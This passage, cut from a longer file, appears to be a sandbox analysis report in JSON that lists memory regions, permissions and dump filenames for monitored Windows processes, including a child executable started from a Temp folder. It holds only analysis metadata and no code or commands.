"filename": null, "id": "region_955", "name": "private_0x0000000004390000", "norm_filename": null, "region_type": "private_memory", "start_va": 70844416, "timestamp": "00:00:53.235", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000956-addr_0x0000000004410000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 71368704, "type": "region", "version": 1 }, "end_va": 71434239, "entry_point": 0, "filename": null, "id": "region_956", "name": "private_0x0000000004410000", "norm_filename": null, "region_type": "private_memory", "start_va": 71368704, "timestamp": "00:00:53.720", "type": "region", 
"version": 1 }, { "dump": { "filename": "process_00000005-region_00000965-addr_0x0000000004710000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74514432, "type": "region", "version": 1 }, "end_va": 74579967, "entry_point": 0, "filename": null, "id": "region_965", "name": "private_0x0000000004710000", "norm_filename": null, "region_type": "private_memory", "start_va": 74514432, "timestamp": "00:00:53.904", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000968-addr_0x0000000004730000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74645504, "type": "region", "version": 1 }, "end_va": 74711039, "entry_point": 0, "filename": null, "id": "region_968", "name": "private_0x0000000004730000", "norm_filename": null, "region_type": "private_memory", "start_va": 74645504, "timestamp": "00:00:53.923", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000969-addr_0x0000000004740000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74711040, "type": "region", "version": 1 }, "end_va": 74776575, "entry_point": 0, "filename": null, "id": "region_969", "name": "private_0x0000000004740000", "norm_filename": null, "region_type": "private_memory", "start_va": 74711040, "timestamp": "00:00:53.924", "type": "region", "version": 1 }, 
{ "dump": { "filename": "process_00000005-region_00000970-addr_0x0000000004750000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74776576, "type": "region", "version": 1 }, "end_va": 74842111, "entry_point": 0, "filename": null, "id": "region_970", "name": "private_0x0000000004750000", "norm_filename": null, "region_type": "private_memory", "start_va": 74776576, "timestamp": "00:00:54.683", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000971-addr_0x0000000004840000-size_0x0000000000990000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 10027008, "start_va": 75759616, "type": "region", "version": 1 }, "end_va": 85786623, "entry_point": 0, "filename": null, "id": "region_971", "name": "private_0x0000000004840000", "norm_filename": null, "region_type": "private_memory", "start_va": 75759616, "timestamp": "00:00:54.684", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000973-addr_0x000000007ff50000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2146762752, "type": "region", "version": 1 }, "end_va": 2146828287, "entry_point": 0, "filename": null, "id": "region_973", "name": "private_0x000000007ff50000", "norm_filename": null, "region_type": "private_memory", "start_va": 2146762752, "timestamp": "00:00:54.685", 
"type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000974-addr_0x000000007ff60000-size_0x0000000000050000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 327680, "start_va": 2146828288, "type": "region", "version": 1 }, "end_va": 2147155967, "entry_point": 0, "filename": null, "id": "region_974", "name": "private_0x000000007ff60000", "norm_filename": null, "region_type": "private_memory", "start_va": 2146828288, "timestamp": "00:00:54.685", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000975-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_975", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:00:54.686", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000976-addr_0x0000000004760000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_166", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 74842112, "type": "region", "version": 1 }, "end_va": 74907647, "entry_point": 0, "filename": null, "id": "region_976", "name": "private_0x0000000004760000", "norm_filename": null, "region_type": "private_memory", "start_va": 
74842112, "timestamp": "00:00:54.892", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000981-addr_0x0000000004770000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 74907648, "type": "region", "version": 1 }, "end_va": 75694079, "entry_point": 0, "filename": null, "id": "region_981", "name": "private_0x0000000004770000", "norm_filename": null, "region_type": "private_memory", "start_va": 74907648, "timestamp": "00:00:54.914", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000985-addr_0x00000000047f0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 75431936, "type": "region", "version": 1 }, "end_va": 75694079, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x00000000047f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 75431936, "timestamp": "00:00:54.943", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000986-addr_0x00000000052e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 86900736, "type": "region", "version": 1 }, "end_va": 87162879, "entry_point": 0, "filename": null, "id": "region_986", "name": "private_0x00000000052e0000", "norm_filename": null, 
"region_type": "private_memory", "start_va": 86900736, "timestamp": "00:00:55.023", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000989-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_170", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147311616, "type": "region", "version": 1 }, "end_va": 2147315711, "entry_point": 0, "filename": null, "id": "region_989", "name": "private_0x000000007ffd6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147311616, "timestamp": "00:00:55.024", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000995-addr_0x00000000051d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_171", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 85786624, "type": "region", "version": 1 }, "end_va": 86835199, "entry_point": 0, "filename": null, "id": "region_995", "name": "private_0x00000000051d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 85786624, "timestamp": "00:00:55.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000996-addr_0x0000000005350000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_172", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 87359488, "type": "region", "version": 1 }, "end_va": 87621631, "entry_point": 0, "filename": null, "id": "region_996", "name": 
"private_0x0000000005350000", "norm_filename": null, "region_type": "private_memory", "start_va": 87359488, "timestamp": "00:00:55.077", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000998-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_173", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_998", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:55.078", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000999-addr_0x0000000005390000-size_0x00000000000e0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_174", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 917504, "start_va": 87621632, "type": "region", "version": 1 }, "end_va": 88539135, "entry_point": 0, "filename": null, "id": "region_999", "name": "private_0x0000000005390000", "norm_filename": null, "region_type": "private_memory", "start_va": 87621632, "timestamp": "00:00:55.079", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001002-addr_0x0000000005390000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_175", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 87621632, "type": "region", "version": 1 }, "end_va": 88276991, "entry_point": 0, 
"filename": null, "id": "region_1002", "name": "private_0x0000000005390000", "norm_filename": null, "region_type": "private_memory", "start_va": 87621632, "timestamp": "00:00:55.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001003-addr_0x0000000005430000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_176", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 88276992, "type": "region", "version": 1 }, "end_va": 88539135, "entry_point": 0, "filename": null, "id": "region_1003", "name": "private_0x0000000005430000", "norm_filename": null, "region_type": "private_memory", "start_va": 88276992, "timestamp": "00:00:55.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00001053-addr_0x0000000004790000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 75038720, "type": "region", "version": 1 }, "end_va": 75104255, "entry_point": 0, "filename": null, "id": "region_1053", "name": "private_0x0000000004790000", "norm_filename": null, "region_type": "private_memory", "start_va": 75038720, "timestamp": "00:00:57.240", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe\"", "filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "id": "proc_6", "image_name": "lambdoidtegument.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { 
"ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00001004-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_177", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1004", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:57.013", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001005-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_178", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_1005", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:57.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_1006", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:57.014", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4435967, "entry_point": 4194304, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\lambdoidtegument.exe", "id": "region_1007", "name": "lambdoidtegument.exe", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\lambdoidtegument.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:57.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1008", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1009", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created 
because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1010", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001011-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1011", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001012-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1012", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:57.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the 
configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1013", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:57.094", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1014", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:57.094", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001015-addr_0x00000000001c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_1015", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:57.095", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001016-addr_0x00000000005f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, 
"size": 65536, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 6291455, "entry_point": 0, "filename": null, "id": "region_1016", "name": "private_0x00000000005f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6225920, "timestamp": "00:00:57.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\System32\\msvbvm60.dll", "id": "region_1017", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\system32\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:00:57.095", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1018", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1019", "name": "rpcrt4.dll", "norm_filename": 
"c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1020", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1968701440, "type": "region", "version": 1 }, "end_va": 1969287167, "entry_point": 1968701440, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1021", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1968701440, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1022", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], 
"info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1023", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1024", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1988411391, "entry_point": 1986985984, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1025", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, 
"end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1026", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1027", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1028", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1029", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": 
"memory_mapped_file", "start_va": 1994653696, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1030", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:57.120", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3702783, "entry_point": 0, "filename": null, "id": "region_1031", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:00:57.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1032", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:00:57.136", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1033", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:57.136", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001034-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1034", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:57.162", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001035-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, 